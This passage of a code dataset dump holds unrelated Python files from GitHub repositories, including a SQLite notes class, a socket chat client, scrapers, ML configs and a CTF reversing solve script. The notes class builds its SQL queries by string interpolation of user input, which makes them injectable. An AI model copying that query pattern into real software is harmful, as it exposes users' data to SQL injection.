econ))\n\n\n\n","repo_name":"Ikerlb/kattis","sub_path":"averageshard/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"41119896511","text":"import sqlite3\nfrom dataclasses import dataclass\n\n@dataclass\nclass Note:\n id: int = None\n title: str = None\n content: str = ''\n\nclass Database():\n def __init__(self,bankName):\n self.conn = sqlite3.connect(bankName + '.db')\n self.conn.execute(\n 'CREATE TABLE IF NOT EXISTS note (id INTEGER PRIMARY KEY, title TEXT, content TEXT NOT NULL);'\n )\n \n def add(self,note):\n id = note.id\n title = note.title\n content = note.content\n comando = f\"INSERT INTO note (title,content) VALUES ('{title}','{content}');\"\n self.conn.execute(\n comando\n )\n self.conn.commit()\n\n def get_all(self):\n l = []\n cursor = self.conn.execute(\n \"SELECT id, title, content FROM note;\"\n )\n for linha in cursor:\n identificador = linha[0]\n titulo = linha[1]\n content = linha[2]\n l.append(Note(identificador,titulo,content))\n return l\n\n def update(self, entry):\n id = entry.id\n titulo = entry.title\n content = entry.content\n comando = f\"UPDATE note SET title = '{titulo}', content = '{content}' WHERE id = {id};\"\n cursor = self.conn.execute(\n comando\n )\n self.conn.commit()\n\n def delete(self, note_id):\n comando = f\"DELETE FROM note WHERE id = {note_id};\"\n cursor = self.conn.execute(\n comando\n )\n self.conn.commit()\n \n def get_by_id(self, id):\n # Seu código para retornar uma nota baseado no ID\n todos = self.get_all()\n for note in todos:\n if note.id == id:\n return note\n ","repo_name":"Fdemaiaar/projetoA---TecWeb","sub_path":"database/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"} +{"seq_id":"16561554961","text":"#! /usr/bin/python3\r\n\r\nimport socket \r\nfrom socket import error\r\nimport sys\r\nimport os\r\nfrom threading import Thread\r\n\r\ndef client():\r\n try:\r\n client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n client.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n client.connect((host, port))\r\n\r\n while True:\r\n try:\r\n ts = Thread(target=send_data, args=(client,), daemon = True)\r\n tr = Thread(target=recv_data, args=(client,), daemon = True)\r\n\r\n ts.start()\r\n tr.start()\r\n\r\n ts.join()\r\n tr.join()\r\n\r\n except KeyboardInterrupt:\r\n client.close()\r\n os._exit(1)\r\n\r\n \r\n except ConnectionRefusedError:\r\n print(f\"\\nCan't Connect with the Server!!!\\nPlease check whether Server application is running and try again.\\n\")\r\n\r\n\r\ndef send_data(client,):\r\n while True:\r\n s_data = input(\"\")\r\n\r\n if len(s_data.strip()) == 0:\r\n s_data = ' '\r\n\r\n client.send(s_data.encode('utf-8'))\r\n\r\n\r\ndef recv_data(client,):\r\n while True:\r\n r_data = client.recv(1024).decode('utf-8')\r\n print(r_data)\r\n \r\n if r_data == \"\":\r\n client.close()\r\n os._exit(1)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n if len(sys.argv) != 2:\r\n print(\"\\nNo port number is provided!\")\r\n print(\" \\uFFEC \")\r\n print(\"usage : python3 \" + str(sys.argv[0]) + \" [port_number]\\n\")\r\n exit(1)\r\n\r\n port = int(sys.argv[1])\r\n host = \"127.0.0.1\"\r\n\r\n client()\r\n \r\n \r\n","repo_name":"GayanSN/Python-Server-Client","sub_path":"Client.py","file_name":"Client.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"13385057702","text":"#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n\nimport cv2\nimport sys\n\nflame_size = 2\nw = 0\nh = 0\n\nif __name__ == '__main__':\n\n cap = cv2.VideoCapture(0)\n ret, flame = cap.read()\n\n while True:\n ret, flame = cap.read()\n if ret == False :\n print(\"Error: Camera capture failed.\")\n sys.exit(1)\n\n height, width = flame.shape[:2]\n hflame = cv2.resize(flame,(width/flame_size,height/flame_size))\n h_height, h_width = hflame.shape[:2]\n\n cv2.circle(hflame,(h_width/2+w,h_height/2+h),20,(0,0,255),2)\n cv2.circle(hflame,(h_width/2+w,h_height/2+h),3,(0,0,255),-1)\n cv2.line(hflame, (h_width/2+w,h_height/2+h+20), (h_width/2+w, h_height/2+h+30), (0, 0, 255),2)\n cv2.line(hflame, (h_width/2+w,h_height/2+h-20), (h_width/2+w, h_height/2+h-30), (0, 0, 255),2)\n cv2.line(hflame, (h_width/2+w+20,h_height/2+h), (h_width/2+w+30, h_height/2+h), (0, 0, 255),2)\n cv2.line(hflame, (h_width/2+w-20,h_height/2+h), (h_width/2+w-30, h_height/2+h), (0, 0, 255),2)\n \n cv2.imshow('camera',hflame)\n if cv2.waitKey(1) == ord('p'):\n break\n\n cap.release()\n cv2.destroyAllWindows()\n print(\"End of camera\")\n","repo_name":"Koshiro-Tanimoto/Lancer_Robot","sub_path":"camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"33746983112","text":"import torch.optim as optim\n\nconfig = {\n 'nr_classes' : 2,\n \n 'training_phase' : [\n {\n 'nr_epochs' : 150, \n 'optimizer_g' : [\n optim.Adam,\n { # should match keyword for parameters within the optimizer\n 'lr' : 1.0e-4, # initial learning rate,\n 'betas' : (0.5, 0.999)\n }\n ],\n 'scheduler_g' : lambda x : optim.lr_scheduler.StepLR(x, 50), # learning rate scheduler\n\n 'optimizer_d' : [\n optim.Adam,\n { # should match keyword for parameters within the optimizer\n 'lr' : 1.0e-4, # initial learning rate,\n 'betas' : (0.5, 0.999)\n }\n ],\n 'scheduler_d' : lambda x : optim.lr_scheduler.StepLR(x, 50), # learning rate scheduler\n\n 'extra_train_opt' : {\n 'generator_period' : 1,\n 'lambda' : 120\n },\n\n 'train_batch_size' : 2,\n 'infer_batch_size' : 1,\n\n # path to load, -1 to auto load checkpoint from previous phase, \n # None to start from scratch\n 'pretrained' : None,\n },\n\n ],\n}\n","repo_name":"QuIIL/UnsupervisedTumorCharacterizationCGAN","sub_path":"model/opt.py","file_name":"opt.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"32103892750","text":"# @Time : 2020/4/15 18:29\n# @Author : Libuda\n# @FileName: qihuo_spider.py\n# @Software: PyCharm\n\nimport requests\n\n\ndef spider():\n url = \"https://flash-api.jin10.com/get_flash_list?channel=2\"\n headers = {\n 'accept': '*/*',\n 'accept-encoding': 'gzip, deflate, br',\n 'accept-language': 'zh-CN,zh;q=0.9,en;q=0.8',\n # 'cookie': 'UM_distinctid=1717d593c7d74c-0998a4179c093a-5313f6f-144000-1717d593c7e5bc; x-token=',\n 'origin': 'https://www.jin10.com',\n 'referer': 'https://www.jin10.com/',\n 'sec-fetch-dest': 'empty',\n 'sec-fetch-mode': 'cors',\n 'sec-fetch-site': 'same-site',\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.113 Safari/537.36',\n 'x-app-id': 'SO1EJGmNgCtmpcPF',\n 'x-version': '1.0.0',\n }\n response = requests.get(url, headers=headers).json()\n\n res = []\n for i in range(20):\n tem = response['data'][i]['data']['content']\n if \"现货报价\" in tem or \"了解请戳\" in tem or \"金十产品\" in tem:\n continue\n tem = tem.replace(\"金十期货讯\", \"\").replace(\"。\", \"。\\n\\n\").replace(\"\", \"\").replace(\"
\", \"\")\n res.append(tem)\n\n return 0, res\n\n\nif __name__ == '__main__':\n res = spider()\n print(res)\n","repo_name":"budaLi/leetcode-python-","sub_path":"qq加群/qihuo_spider.py","file_name":"qihuo_spider.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"65"} +{"seq_id":"40156060667","text":"from pwn import *\n\nwith open('switcheroo', 'rb') as f:\n f.seek(0x203c)\n length = 0x243b - 0x203c + 1\n ct = f.read(length)\n\n\nflag = b''\nfor i in range(0x3f):\n _start = 0x107\n while _start != -1:\n _start = ct.find(bytes([i]), _start + 1)\n to_check = 7 - (_start % 8)\n\n pt = -1\n if to_check != 0 and ct[_start + to_check] >= to_check:\n # to_check == 0: JUMP to `0x040106b`\n # ct[_start + to_check] >= to_check\n # => s.t. it can check till `i` and jump to `0x40106e`\n pt = _start - 7 + to_check\n\n if pt != -1 and pt % 8 == 0:\n pt = pt // 8\n if pt >= 0x21 and pt <= 0x7e:\n flag += bytes([pt])\n break\n\nlog.success(f'FLAG: {flag.decode()}')\n\nif args.VERIFY:\n elf = ELF('./switcheroo')\n context.binary = elf\n r = process([elf.path])\n r.recvuntil(b'flag: ')\n r.sendline(flag)\n log.info(r.recvline()[:-1].decode())\n","repo_name":"mhsuab/ctf","sub_path":"la23/switcheroo/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"22118736567","text":"import pandas as pd\nfrom bs4 import BeautifulSoup\n\ndji_components = [\"v\", \"xom\", \"wmt\", \"cat\", \"cvx\", \"aapl\", \"gs\", \"axp\",\n \"ibm\", \"mcd\", \"mmm\", \"jpm\", \"ba\", \"trv\", \"msft\", \"dwdp\",\n \"pg\", \"nke\", \"ko\", \"mrk\", \"dis\", \"csco\", \"intc\", \"jnj\",\n \"pfe\", \"unh\", \"hd\", \"wba\", \"vz\", \"utx\"]\n\"\"\"list(str): List of Dow Jones Industrial Index component tickers.\"\"\"\n\ndefault_liquid = {\n \"VXX\", \"GE\", \"F\", \"EEM\", \"USO\", \"BAC\", \"XLF\", \"JNK\", \"GGB\", \"FXI\",\n \"EFA\", \"SLV\", \"HYG\", \"GDX\", \"XOP\", \"SPY\", \"AKS\", \"TVPT\", \"QQQ\", \"T\", \"CHK\",\n \"FCX\", \"SWN\", \"VALE\", \"AAPL\", \"ESV\", \"IWM\", \"GLD\", \"AGI\", \"CVE\", \"CPE\",\n \"BBD\", \"WFT\", \"AMD\", \"WFC\", \"IBN\", \"MSFT\", \"NIO\", \"SAN\", \"BB\", \"NVAX\", \"JD\",\n \"SIRI\", \"INTC\", \"GSAT\", \"QEP\", \"VZ\", \"CMCSA\", \"GIS\", \"JPM\", \"EWZ\", \"SNAP\",\n \"C\", \"MU\", \"QCOM\", \"BCS\", \"NGD\", \"XLU\", \"FB\", \"RIG\", \"KNX\", \"JCP\", \"RF\",\n \"NOK\", \"ENPH\", \"PACB\", \"GPRO\", \"NOG\", \"PBR\", \"FITB\", \"DNR\", \"AMBC\", \"APHA\",\n \"SLB\", \"PE\", \"KMI\", \"UNIT\", \"FIT\", \"XLP\", \"SQQQ\", \"ZNGA\", \"PSEC\", \"PFE\",\n \"MS\", \"LEN\", \"EVRI\", \"DIS\", \"UXIN\", \"ITUB\", \"SBUX\", \"PVG\", \"PLUG\", \"AUY\",\n \"GM\", \"CZR\", \"KHC\", \"TWTR\", \"GFI\", \"ET\", \"TEVA\", \"RAD\", \"NIHD\", \"M\", \"TXT\",\n \"ZAYO\", \"UUP\", \"DB\", \"KO\", \"TTOO\", \"FHN\", \"EBAY\", \"FCAU\", \"KRE\", \"SID\",\n \"ACRX\", \"HAL\", \"TLT\", \"WPM\", \"IQ\", \"XHB\", \"ERIC\", \"IAG\", \"AAL\", \"NLSN\", \"X\",\n \"HL\", \"SQ\", \"NWL\", \"GLNG\", \"XME\", \"AGNC\", \"DF\", \"MRK\", \"CSCO\", \"OIH\", \"NEM\",\n \"CLNE\", \"MEET\", \"HPQ\", \"PCG\", \"GOLD\", \"FEZ\", \"PEGI\", \"HBAN\", \"CLF\", \"BKS\",\n \"SNH\", \"EWW\", \"NEPT\", \"XLE\", \"LVS\", \"XLRE\", \"BMY\", \"USB\", \"SAND\", \"WMT\",\n \"MRVL\", \"VNQ\", \"BABA\", \"ADMP\", \"TRQ\", \"FSM\", \"DBD\", \"SPWR\", \"GERN\", \"CRNT\",\n \"CS\", \"V\", \"TGT\", \"CAG\", \"RESI\", \"GNW\", \"ACB\", \"ARCC\", \"XLK\", \"EQT\", \"DAL\",\n \"GORO\", \"HST\", \"ORCL\", \"XBI\", \"AMRS\", \"GDXJ\", \"XLI\", \"MGM\", \"GEL\", \"NVDA\",\n \"PG\", \"CY\", \"JNJ\", \"GNC\", \"AMAT\", \"USAT\", \"AVEO\", \"DXC\", \"XOM\", \"PDD\",\n \"MTG\", \"SMH\", \"TXMD\", \"IMMR\", \"MRO\", \"IBM\", \"WATT\", \"CLDR\", \"BBBY\",\n \"NBR\", \"BRFS\", \"TROX\", \"NE\", \"CNQ\", \"TSM\", \"PEG\", \"BTI\", \"MET\", \"EWJ\",\n \"CYH\", \"FEYE\", \"CNX\", \"KGC\", \"SFUN\", \"PSO\", \"XRT\", \"AEZS\", \"IEF\", \"STM\",\n \"NUGT\", \"BP\", \"VSTM\", \"CX\",\n}\n\ndefault_faves = {\n # liquid etfs\n \"SPY\", \"QQQ\", \"IWM\", \"VXX\", \"TLT\", \"IBB\", \"EEM\", \"XLF\", \"GDX\", \"XOP\", \"SLV\",\n # big techies\n \"AAPL\", \"AMZN\", \"FB\", \"NFLX\", \"GOOGL\", \"MSFT\", \"ADBE\", \"ORCL\", \"CSCO\",\n # unicorns\n \"SPOT\", \"SNAP\", \"EB\", \"IRBT\", \"TSLA\", \"CHGG\", \"ROKU\", \"FITB\", \"GPRO\",\n # video games\n \"ATVI\", \"EA\", \"TTWO\",\n # semis\n \"AMD\", \"NVDA\", \"MU\", \"INTC\", \"QCOM\",\n # banks\n \"BAC\", \"WFC\", \"JPM\", \"C\", \"GS\", \"MS\",\n # retail\n \"GOOS\", \"WMT\", \"LULU\", \"RH\", \"FOSL\",\n # telecom\n \"T\", \"TMUS\", \"VZ\", \"S\", \"CMCSA\",\n # pot\n \"CGC\", \"TLRY\", \"NBEV\", \"NEPT\", \"ABBV\",\n # china\n \"TME\", \"JD\", \"BABA\", \"NIO\",\n # some grandpa stocks\n \"DE\", \"MCD\", \"DIS\", \"BA\", \"X\",\n # dividend candidates\n \"STZ\", \"STM\", \"CPB\", \"XOM\", \"PPL\", \"KO\", \"PEP\",\n # saas\n \"NOW\", \"FIVN\", \"TEAM\", \"TWLO\", \"CRM\", \"WDAY\", \"ZS\", \"FEYE\", \"VEEV\", \"OKTA\",\n # misc\n \"BJ\", \"XLNX\", \"MEET\",\n}\n\"\"\"list(str): List of liquid, optionable, and well-known tickers according\nto the author \"\"\"\n\n\n# SYMBOL LOADERS -----------------------------------------\ndef load_sp500_weights():\n \"\"\"\n Loads a list of the S&P500 components and their weight in the index.\n :return: table containing information about S&P500 components\n :type: pd.DataFrame\n \"\"\"\n cache_fn = \"sp500_weights.csv\"\n try:\n sp500_weights = pd.read_csv(cache_fn)\n except IOError:\n # \"spx_page.html\" is an html page manually saved from the source of\n # https://www.slickcharts.com/sp500\n with open(\"spx_page.html\") as fobj:\n soup = BeautifulSoup(fobj.read())\n\n columns = [th.text.strip() for th in soup.thead.find_all('th')]\n rows = [[td.text.strip() for td in tr.find_all(\"td\")]\n for tr in soup.tbody.find_all(\"tr\")]\n df = pd.DataFrame(rows, columns=columns)\n df.Change = df.Change.apply(lambda s: float(s.split(\" \")[0]))\n df.Price = df.Price.apply(lambda s: float(s.replace(\",\", \"\")))\n df.Weight = df.Weight.apply(float)\n df.to_csv(cache_fn)\n sp500_weights = df\n\n return sp500_weights\n\ndef load_tastyworks_screener(fn):\n \"\"\"\n loads a tastyworks screener exported as a CSV file, and returns the list\n of symbols in the screener.\n note that the exported files from tastyworks often need some doctoring\n tickers are added that have been long bought out or bankrupt\n and other tickers are for indices, which IEX won't have\n :param fn: CSV file path\n :return: list of str\n \"\"\"\n screener = pd.read_csv(fn)\n return list(screener.Symbol)","repo_name":"ktarrant/btscreener","sub_path":"btscreener/collector/tickers.py","file_name":"tickers.py","file_ext":"py","file_size_in_byte":4747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"37460352492","text":"import json\nimport datetime\nimport argparse\nimport snscrape.modules.twitter as sntwitter\nfrom tqdm.auto import tqdm\n\nparser = argparse.ArgumentParser(\n description='retrieve-tweets - thank you Elon')\nparser.add_argument('construction', type=str,\n help='zijt | bent')\nparser.add_argument('year', type=int, help='The year to scrape for')\n\nargs = parser.parse_args()\n\nYEAR = str(args.year)\n\nYEAR_SNIPPET = f\"since:{YEAR}-01-01 until:{YEAR}-12-31\"\nGIJ_BENT_QUERY = f\"(ge OR gij OR gy bent) OR \\\"bende gij\\\" -je -jij {YEAR_SNIPPET} lang:nl\"\nGIJ_ZIJT_QUERY = f\"(ge OR gij OR gy zijt) OR (ge OR gij OR gy zyt) OR (zijde ge OR zijde gij OR zijde gy) OR (zyde ge OR zyde gij OR zyde gy) OR (zedde ge OR zedde gij OR zedde gy) {YEAR_SNIPPET} -je -jij lang:nl\"\n\nOUTPUT_FILE = f\"output/{args.construction}_{YEAR}.jsonl\"\n\ndef date_to_string(date):\n return date.strftime(\"%Y-%m-%d %H:%M:%S\")\n\ndef tweet_to_dict(tweet):\n return {\n \"url\": tweet.url,\n \"date\": date_to_string(tweet.date),\n \"content\": tweet.rawContent,\n \"id\": tweet.id,\n \"username\": tweet.user.username,\n \"user_id\": tweet.user.id,\n \"user_display_name\": tweet.user.displayname,\n \"user_description\": tweet.user.rawDescription,\n \"user_verified\": tweet.user.verified,\n \"user_created\": date_to_string(tweet.user.created),\n \"user_followers_count\": tweet.user.followersCount,\n \"user_friends_count\": tweet.user.friendsCount,\n \"user_tweet_count\": tweet.user.statusesCount,\n \"user_favourites_count\": tweet.user.favouritesCount,\n \"user_listed_count\": tweet.user.listedCount,\n \"user_media_count\": tweet.user.mediaCount,\n \"user_location\": tweet.user.location,\n \"user_profile_image_url\": tweet.user.profileImageUrl,\n \"reply_count\": tweet.replyCount,\n \"retweet_count\": tweet.retweetCount,\n \"retweet_count\": tweet.retweetCount,\n \"retweet_count\": tweet.retweetCount,\n \"like_count\": tweet.likeCount,\n \"quote_count\": tweet.quoteCount,\n \"source_label\": tweet.sourceLabel,\n #\"links\": tweet.links,\n \"mentioned_users_count\": len(tweet.mentionedUsers) if tweet.mentionedUsers is not None else 0,\n \"coordinates\": (tweet.coordinates.latitude, tweet.coordinates.longitude) if tweet.coordinates is not None else None,\n \"place\": (tweet.place.id, tweet.place.fullName, tweet.place.name) if tweet.place is not None else None,\n \"hashtags\": tweet.hashtags\n }\n\nQUERY = GIJ_BENT_QUERY if args.construction == \"bent\" else GIJ_ZIJT_QUERY\n\nwith open(OUTPUT_FILE, \"at\", encoding=\"UTF-8\") as writer:\n for tweet in tqdm(sntwitter.TwitterSearchScraper(QUERY).get_items(), desc=YEAR):\n tweet_dict = tweet_to_dict(tweet)\n tweet_json = json.dumps(tweet_dict)\n writer.write(f\"{tweet_json}\\n\")","repo_name":"AntheSevenants/gij-bent","sub_path":"1-retrieve-tweets.py","file_name":"1-retrieve-tweets.py","file_ext":"py","file_size_in_byte":2859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"23770802611","text":"class TermPrinter:\n @staticmethod\n def print(any_term, with_sign=False, sign_space=1):\n if type(any_term) in [float, int]:\n if any_term == 0:\n return \"\"\n else:\n return TermPrinter.get_printable_coefficient(any_term)\n\n sign = \"\"\n if with_sign:\n if any_term.get_coefficient() < 0:\n sign = (\" \" * sign_space) + \"-\" + (\" \" * sign_space)\n elif any_term.get_coefficient() > 0:\n sign = (\" \" * sign_space) + \"+\" + (\" \" * sign_space)\n\n any_term = abs(any_term) # The sign will be add already\n\n if hasattr(any_term, \"terms\"):\n return sign + TermPrinter.__print_multiple_alpha_term(abs(any_term))\n elif hasattr(any_term, \"is_equal_zero\"):\n return sign + TermPrinter.__print_alpha_term(abs(any_term))\n else:\n raise ValueError(\"The any_term parameter must be an actionable value.\")\n\n @staticmethod\n def __print_alpha_term(term):\n if term.get_coefficient() == 0:\n return \"\"\n elif term.get_exponent() == 0:\n return term.get_printable_coefficient()\n elif term.get_exponent != 0:\n if abs(term.get_coefficient()) == 1:\n return term.get_alpha() + TermPrinter.get_printable_exponent(term.get_exponent())\n else:\n return (term.get_printable_coefficient()\n + term.get_alpha()\n + TermPrinter.get_printable_exponent(term.get_exponent()))\n\n @staticmethod\n def __print_multiple_alpha_term(multiple_term):\n if multiple_term.get_coefficient() == 0:\n return \"\"\n else:\n coefficient = multiple_term.get_coefficient()\n alp_exp = \"\"\n for term in multiple_term.seperated_terms:\n term.set_coefficient(1)\n obj = TermPrinter.__print_alpha_term(term)\n if not obj.isnumeric():\n alp_exp += obj\n\n if len(alp_exp) == 0:\n return TermPrinter.get_printable_coefficient(coefficient)\n else:\n pr_coe = \"\"\n if coefficient != 1:\n pr_coe = TermPrinter.get_printable_coefficient(coefficient)\n\n return pr_coe + alp_exp\n\n @staticmethod\n def get_printable_coefficient(_coe):\n return str(int(_coe)) if float(_coe).is_integer() else str(_coe)\n\n @staticmethod\n def get_printable_exponent(_exp, is_regular=True):\n if _exp in [0, 1] and is_regular:\n return \"\"\n\n minus = \"⁻\"\n if _exp == -1 and is_regular:\n return minus\n\n exponents = ['⁰', '¹', '²', '³', '⁴', '⁵', '⁶', '⁷', '⁸', '⁹']\n abs_exponent = abs(_exp)\n result = minus if _exp < 0 else \"\"\n\n for i in str(abs_exponent):\n result += exponents[int(i)]\n return result\n","repo_name":"lightningcell/unknown-terms","sub_path":"printer.py","file_name":"printer.py","file_ext":"py","file_size_in_byte":2959,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"65"} +{"seq_id":"6699064622","text":"from mdp import *\nimport numpy as np\n\n\nclass IndicatorWorld(GridMDP):\n def __init__(self, terminals, grid_size,cell_size , gamma=.9, stochastic = False):\n self.grid_size = grid_size\n self.cell_size = cell_size\n\n grid, self.true_weight = self.build_random(self.grid_size, self.cell_size )\n GridMDP.__init__(self, grid, terminals, init=(0, 0), gamma=gamma, stochastic = stochastic)\n\n def get_feature_vector(self, s):\n x = s[0]\n y = s[1]\n f = np.array([0.0] * (self.grid_size / self.cell_size) ** 2)\n f[self.macro_cell(self.grid_size - 1 - y, x)] = 1\n return f\n\n def grid_from_w(self, w):\n '''\n get grid world with rewards given the weigts to indicator features\n '''\n l = [[0.0] * self.grid_size for i in xrange(self.grid_size)]\n\n for i in xrange(self.grid_size):\n for j in xrange(self.grid_size):\n l[i][j] = w[self.macro_cell(i, j)]\n return l\n\n def macro_cell(self, x, y):\n size = self.grid_size\n cells = self.cell_size\n cells_per_row = (size / cells)\n return x / cells + y / cells * cells_per_row\n\n def w_from_grid(self, l):\n w = np.array([0.0]*self.grid_size**2)\n for i in xrange(self.grid_size):\n for j in xrange(self.grid_size):\n w[self.macro_cell(i, j)] = l[i][j]\n return w\n\n def build_random(self, size, cells):\n '''\n size is the size of the nxn grid (size = n)\n cells is the number of grid points in one macro cell region. - should divide size exactly\n '''\n w = []\n w_sum = 0\n for i in xrange((size / cells) ** 2):\n # if i < 32:\n # w[i] = -1\n\n if random.uniform(0, 1) < 0.3: # with probability 0.1\n if random.uniform(0, 1) < 0.6: # with probability 0.8\n w.append(-1)\n else:\n w.append(random.uniform(0, 1))\n else:\n w.append(0)\n w_sum += abs(w[-1])\n\n if len(w) > 50:\n for i in xrange(len(w)):\n w[i] = w[i] / float(w_sum)\n\n elif len(w) > 20:\n w = [0] * (size / cells) ** 2\n w[-1] = 1\n else:\n w[0] = 10\n w[1] = 10\n w[2] = -10\n w[3] = 0\n\n # if len(w) > 4:\n # print kk\n\n return self.grid_from_w(w), np.array(w)","repo_name":"siddharthanpr/irl","sub_path":"aima-python/indicatorgridworld.py","file_name":"indicatorgridworld.py","file_ext":"py","file_size_in_byte":2464,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"65"} +{"seq_id":"33573213863","text":"\"\"\"\nMain Module\n\"\"\"\n\nimport graph\nfrom predicates import LessThan, Equals\n\n\nif __name__ == \"__main__\":\n G = graph.Graph()\n G.create_variable(\"Befristung\")\n G.create_variable(\"Arbeitszeit\")\n\n g_109 = G.create_goal(\"109\")\n g_110 = G.create_goal(\"110\")\n\n LT = LessThan(7)\n EQ = Equals(3)\n C = G.add_constraint(\"109\", \"Befristung\", [[LT, LT], [EQ]])\n print(C)\n bef = G.get_variable(\"Befristung\")\n #bef.set_value(3)\n\n a = G.get_variable(\"Blah\")\n b = G.get_variable(\"Blah\")\n\n c = G.get_goal(\"Ziel\")\n d = G.get_goal(\"Ziel\")\n\n most_relevant_variable = G.get_most_relevant_variable()\n valid_goals = G.get_valid_goals()\n print(most_relevant_variable)\n for valid_goal in valid_goals:\n print(valid_goal)","repo_name":"v1ctr/akinator-io","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"65"} +{"seq_id":"40803979595","text":"import json\nfrom datetime import datetime\n\n\nclass Driver:\n id: int = 0\n driver_license_no: str = \"\"\n driver_code: str = \"\"\n co_driver_id: int = 0\n trailer_no: str = \"\"\n note: str = \"\"\n enable_for_elds: bool = True\n enable_for_elog: bool = False\n allow_yard_move: bool = False\n allow_personal_conveyance: bool = False\n activated_datetime: datetime = datetime.now()\n terminated_datetime: datetime = datetime.now()\n date_created: datetime = datetime.now()\n app_version: str = \"\"\n status: int = 1\n color: str = \"\"\n device_version_id: int = 0\n driver_license_issue_state_id: int = 0\n terminal_id: int = None\n vehicle_id: int = None\n user_id: int = None\n organization_id: int = None\n\n\n def __init__(self, data=None):\n if not data:\n data = {}\n self.deserialize(data)\n\n\n def deserialize(self, data):\n if not data:\n data = {}\n self.id = data.get(\"id\", self.id)\n self.driver_license_no = data.get(\"driver_license_no\", self.driver_license_no)\n self.driver_code = data.get(\"driver_code\", self.driver_code)\n self.co_driver_id = data.get(\"co_driver_id\", self.co_driver_id)\n self.trailer_no = data.get(\"trailer_no\", self.trailer_no)\n self.note = data.get(\"note\", self.note)\n self.enable_for_elds = data.get(\"enable_for_elds\", self.enable_for_elds)\n self.enable_for_elog = data.get(\"enable_for_elog\", self.enable_for_elog)\n self.allow_yard_move = data.get(\"allow_yard_move\", self.allow_yard_move)\n self.allow_personal_conveyance = data.get(\"allow_personal_conveyance\", self.allow_personal_conveyance)\n self.activated_datetime = data.get(\"activated_datetime\", self.activated_datetime)\n self.terminated_datetime = data.get(\"terminated_datetime\", self.terminated_datetime)\n self.date_created = data.get(\"terminated_datetime\", self.terminated_datetime)\n self.app_version = data.get(\"app_version\", self.app_version)\n self.status = data.get(\"status\", self.status)\n self.color = data.get(\"color\", self.color)\n self.device_version_id = data.get(\"device_version_id\", self.device_version_id)\n self.driver_license_issue_state_id = data.get(\"driver_license_issue_state_id\",\n self.driver_license_issue_state_id)\n self.terminal_id = data.get(\"terminal_id\", self.terminal_id)\n self.vehicle_id = data.get(\"vehicle_id\", self.vehicle_id)\n self.user_id = data.get(\"user_id\", self.user_id)\n self.organization_id = data.get(\"organization_id\", self.organization_id)\n\n\n def serialize(self):\n _data = {}\n for param, val in self.__dict__.items():\n _data[param] = val\n return _data\n\n\n def to_json(self):\n return json.dumps(self.serialize())\n","repo_name":"shohruh-abduakhatov-portfolio/logitab-py","sub_path":"executors/models/driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":2866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"20439401848","text":"import boto3\nfrom prepare_params import prepare_params\n\nclient = boto3.client('ssm')\n\ndefined_params = prepare_params().keys()\n\n\nremote_params = client.describe_parameters(\n ParameterFilters=[\n {\n \"Key\": \"Type\",\n \"Values\": [\"SecureString\"]\n }\n ]\n)['Parameters']\n\nparams = []\n\nfor parameter in remote_params:\n name = parameter['Name']\n if name not in defined_params:\n if name != '/core/mysql/user/master/password':\n params.append(name)\n\nif(len(params) > 0):\n response = client.delete_parameters(Names=params)\n print(response)\nprint('Done cleaning secure params')\n","repo_name":"deweiliu/parameter-store","sub_path":"sdk-secure-parameters/clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"20420926922","text":"import logging\nimport os\nimport dbus\nimport re\nimport gi\nfrom safeeyes.model import TrayAction\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk\n\ntray_icon_path = None\n\n\ndef __active_players():\n \"\"\"\n List of all media players which are playing now.\n \"\"\"\n players = []\n bus = dbus.SessionBus()\n\n for service in bus.list_names():\n if re.match('org.mpris.MediaPlayer2.', service):\n player = bus.get_object(service, \"/org/mpris/MediaPlayer2\")\n interface = dbus.Interface(player, 'org.freedesktop.DBus.Properties')\n status = str(interface.Get('org.mpris.MediaPlayer2.Player', 'PlaybackStatus')).lower()\n if status == \"playing\":\n players.append(player)\n return players\n\n\ndef __pause_players(players):\n \"\"\"\n Pause all playing media players using dbus.\n \"\"\"\n for player in players:\n interface = dbus.Interface(player, dbus_interface='org.mpris.MediaPlayer2.Player')\n interface.Pause()\n\n\ndef init(ctx, safeeyes_config, plugin_config):\n \"\"\"\n Initialize the screensaver plugin.\n \"\"\"\n global tray_icon_path\n tray_icon_path = os.path.join(plugin_config['path'], \"resource/pause.png\")\n\n\ndef get_tray_action(break_obj):\n \"\"\"\n Return TrayAction only if there is a media player 